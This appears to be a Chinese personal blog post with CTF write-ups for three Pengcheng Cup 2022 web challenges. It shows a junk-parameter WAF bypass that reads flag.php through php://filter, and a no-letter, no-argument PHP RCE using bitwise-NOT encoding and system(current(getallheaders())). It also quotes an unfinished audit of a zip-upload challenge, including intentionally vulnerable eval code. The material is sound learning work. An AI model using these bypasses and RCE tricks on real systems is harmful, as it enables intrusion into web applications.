<!DOCTYPE html><html lang="ch" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>鹏城杯2022 | Hexo</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><script>var config = {"root":"/","search":{"preload":true,"activeHolder":"键入以继续","blurHolder":"数据检索","noResult":"无 $0 相关数据"},"code":{"codeInfo":"$0 - 共 $1 行","copy":"复制","copyFinish":"复制成功","expand":"展开"}}</script><script src="//unpkg.com/mermaid@9.2.2/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/brands.min.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/fontawesome.min.css"><link rel="stylesheet" href="/css/arknights.css"><script>if (window.localStorage.getItem('theme-mode') === 'light') document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark') document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.ttf");
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Brands';
 src: local('Font Awesome 6 Brands'), url('/lib/fontawesome/fa-brands.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Free';
 src: local('Font Awesome 6 Free'), url('/lib/fontawesome/fa-regular.woff2') format('woff2');
}</style><style>:root {
  --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
  --light-background: url('/img/bk.jpg');
}</style><meta name="generator" content="Hexo 6.3.0"></head><body><div class="loading" style="opacity: 0"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><nav><div class="navBtn hide"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="数据检索" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>鹏城杯2022</h1><div id="post-info"><span>文章发布时间: <div class="control"><time datetime="2023-05-09T12:18:59.000Z" id="date"> 2023-05-09</time></div></span><br><span>最后更新时间: <div class="control"><time datetime="2023-05-12T00:44:15.582Z" id="updated"> 2023-05-12</time></div></span></div></div><hr><div id="post-content"><h1>[鹏城杯 2022]简单包含</h1>
<p>emmmm，应该是商用的最简单的waf，使用脏数据绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">payload：1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;1=1&amp;flag=php://filter/convert.base64-encode/resource=flag.php<br></code></pre></td></tr></table></figure>
<p class='item-img' data-src='/2023/05/09/%E9%B9%8F%E5%9F%8E%E6%9D%AF2022/image-20230509202710916.png'><img src="/2023/05/09/%E9%B9%8F%E5%9F%8E%E6%9D%AF2022/image-20230509202710916.png" alt="image-20230509202710916"></p>
<p>用脏数据是waf绕过常用手段</p>
<h1>[鹏城杯 2022]简单的php</h1>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">&lt;?php<br>show_source(__FILE__);<br>    $code = $_GET[&#x27;code&#x27;];<br>    if(strlen($code) &gt; 80 or preg_match(&#x27;/[A-Za-z0-9]|\&#x27;|&quot;|`|\ |,|\.|-|\+|=|\/|\\|&lt;|&gt;|\$|\?|\^|&amp;|\|/is&#x27;,$code))&#123;<br>        die(&#x27; Hello&#x27;);<br>    &#125;else if(&#x27;;&#x27; === preg_replace(&#x27;/[^\s\(\)]+?\((?R)?\)/&#x27;, &#x27;&#x27;, $code))&#123;<br>        @eval($code);<br><br>    &#125;<br><br>?&gt; <br></code></pre></td></tr></table></figure>
<p>很明显的无字符rce</p>
<p>虽然说之前总结了，但是这次实战还是写不出来</p>
<p class='item-img' data-src='/2023/05/09/%E9%B9%8F%E5%9F%8E%E6%9D%AF2022/image-20230511133553700.png'><img src="/2023/05/09/%E9%B9%8F%E5%9F%8E%E6%9D%AF2022/image-20230511133553700.png" alt="image-20230511133553700"></p>
<p>再根据这道题总结一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">参考文章：https://www.cnblogs.com/0xo0Kerk/p/17236536.html<br><br>https://blog.csdn.net/Manuffer/article/details/120738755<br></code></pre></td></tr></table></figure>
<p>学习一下什么是无参数RCE，现在才明白RCE中好像有无参数和无字符</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">&lt;?php<br>	if(&#x27;;&#x27; === preg_replace(&#x27;/[a-z,_]+\((?R)?\)/&#x27;, NULL, $_GET[&#x27;exp&#x27;])&#123;<br> 		     eval($_GET[&#x27;exp&#x27;]);<br>	&#125;<br>?&gt;<br></code></pre></td></tr></table></figure>
<p>看下这段代码，</p>
<p>一点一点进行审计。</p>
<p>‘;’ === preg_replace('/[a-z,_]+((?R)?)/'这个如果对了，就执行 $_GET[‘exp’]，然后eval($_GET[‘exp’]);</p>
<p><code>[a-z,_]</code>匹配小写字母和下划线 <code>+</code>表示1到多个</p>
<p><code>(?R)</code>代表当前表达式，就是这个(/[a-z,_]+((?R)?)/)，所以会一直递归，<code>?</code>表示递归当前表达式0次或1次（若是<code>(?R)*</code>则表示递归当前表达式0次或多次，例如它可以匹配<code>a(b(c()d()))</code>）</p>
<p>简单说来就是：这串代码检查了我们通过GET方式传入的exp参数的值，如果传进去的值是传进去的值是字符串接一个()，那么字符串就会被替换为空。如果（递归）替换后的字符串只剩下;,那么我们传进去的 exp 就会被 eval 执行。比如我们传入一个 phpinfo();，它被替换后就只剩下;，那么根据判断条件就会执行phpinfo();。</p>
<p>(?R)?能匹配的只有a(); a(b()); a(b(c()));这种类型的。比如传入a(b(c()));，第一次匹配后，就剩a(b());，第二次匹配后，a();，第三次匹配后就只剩下;了，最后a(b(c()));就会被eval执行。</p>
<p>大概是可以理解了</p>
<p class='item-img' data-src='/2023/05/09/%E9%B9%8F%E5%9F%8E%E6%9D%AF2022/image-20230511135920829.png'><img src="/2023/05/09/%E9%B9%8F%E5%9F%8E%E6%9D%AF2022/image-20230511135920829.png" alt="image-20230511135920829"></p>
<p>再回头看这道题，就应该是无字母加上无参数rce一起上来</p>
<p>我们先测试一下可用字符</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">for</span>(<span class="hljs-variable">$i</span>=<span class="hljs-number">32</span>;<span class="hljs-variable">$i</span>&lt;<span class="hljs-number">127</span>;<span class="hljs-variable">$i</span>++)&#123;<br>    <span class="hljs-keyword">if</span> (!<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/[A-Za-z0-9]|\&#x27;|&quot;|`|\ |,|\.|-|\+|=|\/|\\|&lt;|&gt;|\$|\?|\^|&amp;|\|/is&#x27;</span>, <span class="hljs-title function_ invoke__">chr</span>(<span class="hljs-variable">$i</span>))) &#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">chr</span>(<span class="hljs-variable">$i</span>);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>
<p class='item-img' data-src='/2023/05/09/%E9%B9%8F%E5%9F%8E%E6%9D%AF2022/image-20230511153126772.png'><img src="/2023/05/09/%E9%B9%8F%E5%9F%8E%E6%9D%AF2022/image-20230511153126772.png" alt="image-20230511153126772"></p>
<p>有百分号和~</p>
<p>取反</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$a</span>=<span class="hljs-string">&quot;phpinfo&quot;</span>;<br><span class="hljs-title function_ invoke__">var_dump</span>(<span class="hljs-title function_ invoke__">urlencode</span>(~<span class="hljs-variable">$a</span>));<br><br></code></pre></td></tr></table></figure>
<p>测试一手phpinfo</p>
<p class='item-img' data-src='/2023/05/09/%E9%B9%8F%E5%9F%8E%E6%9D%AF2022/image-20230511153218263.png'><img src="/2023/05/09/%E9%B9%8F%E5%9F%8E%E6%9D%AF2022/image-20230511153218263.png" alt="image-20230511153218263"></p>
<p>一切都很顺利</p>
<p class='item-img' data-src='/2023/05/09/%E9%B9%8F%E5%9F%8E%E6%9D%AF2022/image-20230511153329822.png'><img src="/2023/05/09/%E9%B9%8F%E5%9F%8E%E6%9D%AF2022/image-20230511153329822.png" alt="image-20230511153329822"></p>
<p>接下来开始准备rce</p>
<p>system(current(getallheaders()));我们利用这一套修改信息头进行rce</p>
<p class='item-img' data-src='/2023/05/09/%E9%B9%8F%E5%9F%8E%E6%9D%AF2022/image-20230511160207275.png'><img src="/2023/05/09/%E9%B9%8F%E5%9F%8E%E6%9D%AF2022/image-20230511160207275.png" alt="image-20230511160207275"></p>
<p>这里不断用脚本进行取反，然后%!FF或者!%FE都是为了给一个合法的函数名去补充，不然我们取反的函数字符字符串会被当作不合法的传入</p>
<p class='item-img' data-src='/2023/05/09/%E9%B9%8F%E5%9F%8E%E6%9D%AF2022/image-20230511160330679.png'><img src="/2023/05/09/%E9%B9%8F%E5%9F%8E%E6%9D%AF2022/image-20230511160330679.png" alt="image-20230511160330679"></p>
<p>结束</p>
<h1>[鹏城杯 2022]压缩包</h1>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><code class="hljs php"> <span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">removedir</span>(<span class="hljs-params"><span class="hljs-variable">$dir</span></span>)</span>&#123;<br>    <span class="hljs-variable">$list</span>= <span class="hljs-title function_ invoke__">scandir</span>(<span class="hljs-variable">$dir</span>);<br>    <span class="hljs-keyword">foreach</span> (<span class="hljs-variable">$list</span> <span class="hljs-keyword">as</span>  <span class="hljs-variable">$value</span>) &#123;<br>       <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">is_file</span>(<span class="hljs-variable">$dir</span>.<span class="hljs-string">&#x27;/&#x27;</span>.<span class="hljs-variable">$value</span>))&#123;<br>         <span class="hljs-title function_ invoke__">unlink</span>(<span class="hljs-variable">$dir</span>.<span class="hljs-string">&#x27;/&#x27;</span>.<span class="hljs-variable">$value</span>);<br>       &#125;<span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span>(<span class="hljs-variable">$value</span>!=<span class="hljs-string">&quot;.&quot;</span>&amp;&amp;<span class="hljs-variable">$value</span>!=<span class="hljs-string">&quot;..&quot;</span>)&#123;<br>                <span class="hljs-title function_ invoke__">removedir</span>(<span class="hljs-variable">$dir</span>.<span class="hljs-string">&#x27;/&#x27;</span>.<span class="hljs-variable">$value</span>);<br>       &#125;<br>    &#125;<br>&#125;<br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">unzip</span>(<span class="hljs-params"><span class="hljs-variable">$filename</span></span>)</span>&#123;<br>        <span class="hljs-variable">$result</span> = [];<br>        <span class="hljs-variable">$zip</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">ZipArchive</span>();<br>        <span class="hljs-variable">$zip</span>-&gt;<span class="hljs-title function_ invoke__">open</span>(<span class="hljs-variable">$filename</span>);<br>        <span class="hljs-variable">$dir</span> = <span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&#x27;DOCUMENT_ROOT&#x27;</span>].<span class="hljs-string">&quot;/static/upload/&quot;</span>.<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$filename</span>);<br>        <span class="hljs-keyword">if</span>(!<span class="hljs-title function_ invoke__">is_dir</span>(<span class="hljs-variable">$dir</span>))&#123;<br>            <span class="hljs-title function_ invoke__">mkdir</span>(<span class="hljs-variable">$dir</span>);<br>        &#125;<br>        <span class="hljs-keyword">if</span>(<span class="hljs-variable">$zip</span>-&gt;<span class="hljs-title function_ invoke__">extractTo</span>(<span class="hljs-variable">$dir</span>))&#123;<br>        <span class="hljs-keyword">foreach</span> (<span class="hljs-title function_ invoke__">scandir</span>(<span class="hljs-variable">$dir</span>) <span class="hljs-keyword">as</span>  <span class="hljs-variable">$value</span>) &#123;<br>            <span class="hljs-variable">$file_ext</span>=<span class="hljs-title function_ invoke__">strrchr</span>(<span class="hljs-variable">$value</span>, <span class="hljs-string">&#x27;.&#x27;</span>);<br>            <span class="hljs-variable">$file_ext</span>=<span class="hljs-title function_ invoke__">strtolower</span>(<span class="hljs-variable">$file_ext</span>); <span class="hljs-comment">//转换为小写</span><br>            <span class="hljs-variable">$file_ext</span>=<span class="hljs-title function_ invoke__">str_ireplace</span>(<span class="hljs-string">&#x27;::$DATA&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-variable">$file_ext</span>);<span class="hljs-comment">//去除字符串::$DATA</span><br>            <span class="hljs-variable">$file_ext</span>=<span class="hljs-title function_ invoke__">trim</span>(<span class="hljs-variable">$file_ext</span>); <span class="hljs-comment">//收尾去空</span><br>            <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">is_dir</span>(<span class="hljs-variable">$dir</span>.<span class="hljs-string">&quot;/&quot;</span>.<span class="hljs-variable">$value</span>)&amp;&amp;<span class="hljs-variable">$value</span>!=<span class="hljs-string">&quot;.&quot;</span>&amp;&amp;<span class="hljs-variable">$value</span>!=<span class="hljs-string">&quot;..&quot;</span>)&#123;<br>                <span class="hljs-title function_ invoke__">removedir</span>(<span class="hljs-variable">$dir</span>);<br>            &#125;<br>            <span class="hljs-keyword">if</span>(!<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;/jpg|png|gif|jpeg/is&quot;</span>,<span class="hljs-variable">$file_ext</span>))&#123;<br>                <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">is_file</span>(<span class="hljs-variable">$dir</span>.<span class="hljs-string">&quot;/&quot;</span>.<span class="hljs-variable">$value</span>))&#123;<br>                    <span class="hljs-title function_ invoke__">unlink</span>(<span class="hljs-variable">$dir</span>.<span class="hljs-string">&quot;/&quot;</span>.<span class="hljs-variable">$value</span>);<br>                &#125;<span class="hljs-keyword">else</span>&#123;<br>                    <span class="hljs-keyword">if</span>(<span class="hljs-variable">$value</span>!=<span class="hljs-string">&quot;.&quot;</span>&amp;&amp;<span class="hljs-variable">$value</span>!=<span class="hljs-string">&quot;..&quot;</span>)<br>                    <span class="hljs-title function_ invoke__">array_push</span>(<span class="hljs-variable">$result</span>,<span class="hljs-variable">$value</span>);<br>                &#125;<br>                <br>            &#125;<br>           <br>        &#125;<br>        <span class="hljs-variable">$zip</span>-&gt;<span class="hljs-title function_ invoke__">close</span>();<br>        <span class="hljs-title function_ invoke__">unlink</span>(<span class="hljs-variable">$filename</span>);<br>        <span class="hljs-keyword">return</span> <span class="hljs-title function_ invoke__">json_encode</span>(<span class="hljs-variable">$result</span>);<br>        &#125;<span class="hljs-keyword">else</span>&#123;<br>            <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>        &#125;<br>    &#125;<br><span class="hljs-variable">$content</span>= <span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">&#x27;content&#x27;</span>];<br><span class="hljs-title function_ invoke__">shell_exec</span>(<span class="hljs-string">&#x27;rm -rf /tmp/*&#x27;</span>);<br><span class="hljs-variable">$fpath</span> =<span class="hljs-string">&quot;/tmp/&quot;</span>.<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$content</span>); <br><span class="hljs-title function_ invoke__">file_put_contents</span>(<span class="hljs-variable">$fpath</span>, <span class="hljs-title function_ invoke__">base64_decode</span>(<span class="hljs-variable">$content</span>));<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">unzip</span>(<span class="hljs-variable">$fpath</span>);<br>    <span class="hljs-meta">?&gt;</span><br>[]<br>Warning: <span class="hljs-title function_ invoke__">mkdir</span>(): No such file <span class="hljs-keyword">or</span> directory in /<span class="hljs-keyword">var</span>/www/html/index.php on line <span class="hljs-number">21</span><br>[][]<br></code></pre></td></tr></table></figure>
<p>开局很复杂吓人的源码</p>
<p>代码审计</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">removedir</span>(<span class="hljs-params"><span class="hljs-variable">$dir</span></span>)</span>&#123;<br>    <span class="hljs-variable">$list</span>= <span class="hljs-title function_ invoke__">scandir</span>(<span class="hljs-variable">$dir</span>);<br>    <span class="hljs-keyword">foreach</span> (<span class="hljs-variable">$list</span> <span class="hljs-keyword">as</span>  <span class="hljs-variable">$value</span>) &#123;<br>       <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">is_file</span>(<span class="hljs-variable">$dir</span>.<span class="hljs-string">&#x27;/&#x27;</span>.<span class="hljs-variable">$value</span>))&#123;<br>         <span class="hljs-title function_ invoke__">unlink</span>(<span class="hljs-variable">$dir</span>.<span class="hljs-string">&#x27;/&#x27;</span>.<span class="hljs-variable">$value</span>);<br>       &#125;<span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span>(<span class="hljs-variable">$value</span>!=<span class="hljs-string">&quot;.&quot;</span>&amp;&amp;<span class="hljs-variable">$value</span>!=<span class="hljs-string">&quot;..&quot;</span>)&#123;<br>                <span class="hljs-title function_ invoke__">removedir</span>(<span class="hljs-variable">$dir</span>.<span class="hljs-string">&#x27;/&#x27;</span>.<span class="hljs-variable">$value</span>);<br>       &#125;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>
<p>scandir这个函数</p>
<p class='item-img' data-src='/2023/05/09/%E9%B9%8F%E5%9F%8E%E6%9D%AF2022/image-20230511160810279.png'><img src="/2023/05/09/%E9%B9%8F%E5%9F%8E%E6%9D%AF2022/image-20230511160810279.png" alt="image-20230511160810279"></p>
<p>得到一个list</p>
<p>然后去删除这些list里面的东西</p>
<p>还有一个函数unzip($filename)</p>
<p>待会分析</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">$content= $_REQUEST[&#x27;content&#x27;];<br>shell_exec(&#x27;rm -rf /tmp/*&#x27;);<br>$fpath =&quot;/tmp/&quot;.md5($content); <br>file_put_contents($fpath, base64_decode($content));<br>echo unzip($fpath);<br></code></pre></td></tr></table></figure>
<p>这是主要思路</p>
<p>传入一个content</p>
<p>然后删除tmp目录下面的所有东西，但是tmp目录还是在的</p>
<p><code>/tmp/</code> 是一个 Linux/Unix 系统中的临时目录，常用于存放临时文件，通常这些文件在系统重启时会被清空。</p>
<p>然后他把$content经过md5后的文件名放到tmp文件路径下</p>
<p>将 <code>$content</code> 变量中的 Base64 编码解码后，将结果写入到 <code>$fpath</code> 变量所代表的文件中，使用 PHP 内置函数 <code>file_put_contents()</code> 实现。具体的实现过程如下：</p>
<ul>
<li>
<p><code>base64_decode($content)</code> 将 <code>$content</code> 变量中的 Base64 编码解码成二进制数据</p>
</li>
<li>
<p><code>file_put_contents($fpath, ...)</code> 将解码后的二进制数据写入到 <code>$fpath</code> 文件中。如果文件不存在，则会创建该文件；如果文件已存在，则会覆盖原有内容。</p>
</li>
</ul>
<p>最后echo了unzip函数里面的$fpath</p>
<p>看看unzip函数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">function unzip($filename)&#123;<br>        $result = [];<br>        $zip = new ZipArchive();//创建一个 ZipArchive 类的实例<br>        $zip-&gt;open($filename);//打开，没有就创建<br>        $dir = $_SERVER[&#x27;DOCUMENT_ROOT&#x27;].&quot;/static/upload/&quot;.md5($filename);//在/static/upload/服务器的目录下面存入md5加密后的$filename<br>        if(!is_dir($dir))&#123;<br>            mkdir($dir);<br>        &#125;// 没有就创造<br>        if($zip-&gt;extractTo($dir))//解压zip到dir<br>        &#123;<br>        foreach (scandir($dir) as  $value) &#123;<br>            $file_ext=strrchr($value, &#x27;.&#x27;);<br>            $file_ext=strtolower($file_ext); //转换为小写<br>            $file_ext=str_ireplace(&#x27;::$DATA&#x27;, &#x27;&#x27;, $file_ext);//去除字符串::$DATA<br>            $file_ext=trim($file_ext); //收尾去空<br>            if(is_dir($dir.&quot;/&quot;.$value)&amp;&amp;$value!=&quot;.&quot;&amp;&amp;$value!=&quot;..&quot;)&#123;<br>                removedir($dir);<br>            &#125;<br>            if(!preg_match(&quot;/jpg|png|gif|jpeg/is&quot;,$file_ext))&#123;<br>                if(is_file($dir.&quot;/&quot;.$value))&#123;<br>                    unlink($dir.&quot;/&quot;.$value);<br>                &#125;else&#123;<br>                    if($value!=&quot;.&quot;&amp;&amp;$value!=&quot;..&quot;)<br>                    array_push($result,$value);<br>                &#125;<br>                <br>            &#125;<br>           <br>        &#125;<br>        $zip-&gt;close();<br>        unlink($filename);//unlink($filename) 方法用于删除 ZIP 文件，因为已经解压完成，ZIP 文件已经不需要了。<br>        return json_encode($result);<br>        &#125;else&#123;<br>            return false;<br>        &#125;<br>    &#125;<br></code></pre></td></tr></table></figure>
<p><code>$zip = new ZipArchive();</code> 的作用是创建一个 ZipArchive 类的实例，以便使用该类提供的方法进行 ZIP 归档文件的操作。</p>
<ul>
<li><code>open()</code>：打开一个 ZIP 归档文件，如果文件不存在则创建它。</li>
</ul>
<p>分析完了什么都不懂。没有找到任何可用的点</p>
<p>接下来是付神教我的方法。</p>
<p>有一个p神博客：<a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/after-phpcms-upload-vul.html">https://www.leavesongs.com/PENETRATION/after-phpcms-upload-vul.html</a></p>
